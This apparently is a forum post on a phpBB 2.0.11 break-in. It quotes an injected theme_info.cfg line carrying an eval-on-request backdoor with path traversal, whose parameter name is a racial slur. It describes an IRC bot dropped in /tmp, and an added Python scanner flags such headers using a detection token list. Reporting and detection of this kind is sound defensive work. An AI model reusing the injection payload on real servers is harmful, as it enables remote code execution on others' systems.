[Number 2]
It seems that with phpBB 2.0.11 some exploit with "auto-generated schemes" is possible, leaving suspect files in our /tmp directory:
Code:
-rw-r--r-- 1 wwwrun nogroup 19628 Oct 22 02:45 a.pl
-rw-rw-rw- 1 wwwrun nogroup 6268 Oct 22 02:45 theme_info.cfg
"theme_info.cfg" is giving a hint where and how the attacker came in:
Code:
// phpBB 2.x auto-generated theme config file for aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../..
/../tmp
"a.pl" seems to be a typical hacker's-IRC which tries to bind to port 6667 and waits for commands there.
Luckily, it seems that the IRC server is unable to function if there's already something binding to 6667.
That was the case with our setup, leading to strange IRC logs when the second part of this (probably worm-)attack tried to reach its little helper on our machine...
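Added example, not part of the original post: a small scanner that looks for theme_info.cfg files whose "auto-generated theme config file for" header carries code or path traversal instead of a plain template name, as in the file quoted above. The allowed-name pattern, the token list and the sample strings are assumptions made for this sketch (the request parameter name in the sample is shortened to `p`).

```python
import re
import sys
from pathlib import Path

# Header comment as it appears in the theme_info.cfg quoted in the post.
HEADER = "// phpBB 2.x auto-generated theme config file for "
# Assumption: a legitimate template name is a plain directory name.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")
# Assumption: tokens that have no place in a template name.
SUSPICIOUS = ("eval(", "$_REQUEST", "$_GET", "$_POST", "..", ";")

def check_header(line):
    """Return findings for one line; an empty list means nothing to report."""
    line = line.lstrip()
    if not line.startswith(HEADER):
        return []
    name = line[len(HEADER):].strip()
    if SAFE_NAME.fullmatch(name):
        return []
    hits = [tok for tok in SUSPICIOUS if tok in name]
    return hits or ["unexpected characters in template name"]

def scan(root):
    """Walk root and map each suspicious theme_info.cfg path to its findings."""
    report = {}
    for path in Path(root).rglob("theme_info.cfg"):
        try:
            with open(path, "r", errors="replace") as fh:
                findings = [f for line in fh for f in check_header(line)]
        except OSError:
            continue  # unreadable file: skip it, keep scanning
        if findings:
            report[str(path)] = findings
    return report

# Constructed samples: a benign header and one modelled on the posted file.
BENIGN = HEADER + "subSilver"
POSTED = HEADER + "aaa=12;eval(stripslashes($_REQUEST[p]));exit();// /../../tmp"

if __name__ == "__main__":
    # Usage: python scan_theme_cfg.py /tmp /path/to/phpBB2/templates
    for root in sys.argv[1:] or ["/tmp"]:
        for cfg, findings in scan(root).items():
            print(f"{cfg}: {', '.join(findings)}")
```

Run it over /tmp and the forum's templates directory; any hit is worth checking together with files owned by the web server user (wwwrun in the listing above) that were created at the same time.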